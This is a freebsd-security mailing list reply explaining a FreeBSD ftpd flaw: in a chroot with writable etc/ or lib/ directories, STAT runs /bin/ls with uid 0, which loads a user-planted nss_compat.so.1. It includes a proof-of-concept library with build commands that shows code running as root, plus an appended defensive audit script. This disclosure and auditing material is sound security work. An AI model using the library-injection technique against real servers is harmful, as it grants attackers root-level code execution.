Re: ftpd security issue ?



Saw this on FD... Anyone know any more details about this?
http://lists.grok.org.uk/pipermail/full-disclosure/2011-November/084372.html

This is a well known hazard of chrooting to directories controlled by
unprivileged users. In this case, the vulnerability exists because ftpd calls
/bin/ls with uid=0 and euid!=0 when the STAT command is issued, and nss_compat.so is
loaded by libc regardless of elevated privileges.

This can be proven by creating a dummy ~/lib/nss_compat.so.1:

[venglin@lagoon ~/lib]$ cat dummy.c
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>   /* getuid(), geteuid() */

/* Run automatically when the library is loaded (the module is linked with
 * -nostartfiles so this _init replaces the default one). It records the real
 * and effective uid of the loading process into the file "asdf" in the
 * current directory. */
void _init() {
    FILE *fp = fopen("asdf", "w+");
    if (fp == NULL)
        return;
    fprintf(fp, "%d %d\n", getuid(), geteuid());
    fclose(fp);
}
[venglin@lagoon ~/lib]$ cc -o dummy.o -c dummy.c -fPIC
[venglin@lagoon ~/lib]$ cc -shared -Wl,-soname,dummy.so -o dummy.so dummy.o -nostartfiles
[venglin@lagoon ~/lib]$ mv dummy.so nss_compat.so.1

And after calling the STAT command:

[venglin@lagoon ~/lib]$ cat ~/asdf
0 3000

BTW. This vulnerability affects only configurations where /etc/ftpchroot exists
or the anonymous user is allowed to create files inside the etc and lib dirs.

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com ** NICHDL: PMF9-RIPE *
* Jabber ID: venglin@xxxxxxxx ** PGP ID: 2578FCAD ** HAM-RADIO: SQ5JIV *
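The condition described in the reply (a chroot whose etc/ or lib/ directory the chrooted user can write to, so that a privileged /bin/ls picks up a user-supplied NSS module) can be audited from the administrator's side. The following is an added example, not code from the original post or from FreeBSD ftpd: a POSIX sh function that takes a chroot root directory and an optional trusted owner (defaulting to root, which is an assumption about the deployment) and reports etc/ or lib/ directories that are not owned by that account or are group/world writable, as well as any lib/nss_*.so* file not owned by it. It relies only on find(1) with -prune, -user and -perm.

```shell
#!/bin/sh
# Added audit helper; not part of the original post or of ftpd itself.
# Usage: audit_ftpchroot /path/to/chroot [trusted_owner]
# Exit status 0 when no finding was produced, 1 otherwise.
audit_ftpchroot() {
    root=$1
    owner=${2:-root}          # assumption: the trusted owner is root
    findings=0

    # 1. The etc/ and lib/ directories inside the chroot must belong to the
    #    trusted owner and must not be group- or world-writable; otherwise
    #    the chrooted user can drop files (e.g. an NSS module) into them.
    for sub in etc lib; do
        dir="$root/$sub"
        [ -d "$dir" ] || continue
        # -prune keeps find on the directory entry itself (no descent)
        if [ -n "$(find "$dir" -prune \( ! -user "$owner" -o -perm -0002 -o -perm -0020 \) -print)" ]; then
            echo "FINDING: $dir is writable by an unprivileged user"
            findings=$((findings + 1))
        fi
    done

    # 2. Any NSS module already present under lib/ must belong to the trusted
    #    owner, since libc loads it into a process that may still hold uid 0.
    for f in "$root"/lib/nss_*.so*; do
        [ -e "$f" ] || continue   # glob did not match anything
        if [ -n "$(find "$f" -prune ! -user "$owner" -print)" ]; then
            echo "FINDING: $f is not owned by $owner"
            findings=$((findings + 1))
        fi
    done

    echo "findings=$findings"
    [ "$findings" -eq 0 ]
}

# Walk every chroot listed in ftpchroot(5), one per line as "user [dir]";
# constructed for illustration, the real file format may carry more fields.
audit_all_ftpchroots() {
    conf=${1:-/etc/ftpchroot}
    [ -r "$conf" ] || { echo "no $conf"; return 0; }
    status=0
    while read -r user dir _; do
        case $user in ''|'#'*) continue ;; esac
        [ -n "$dir" ] || dir=$(eval echo "~$user")
        audit_ftpchroot "$dir" || status=1
    done < "$conf"
    return "$status"
}
```

Running `audit_ftpchroot /home/ftp` on a host where lib/ is owned by the ftp account, or where an anonymous upload directory sits inside etc/ or lib/, prints a FINDING line for each such path and exits nonzero, which makes it usable from a periodic(8) script or a configuration test.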
_______________________________________________
freebsd-security@xxxxxxxxxxx mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-security
To unsubscribe, send any mail to "freebsd-security-unsubscribe@xxxxxxxxxxx"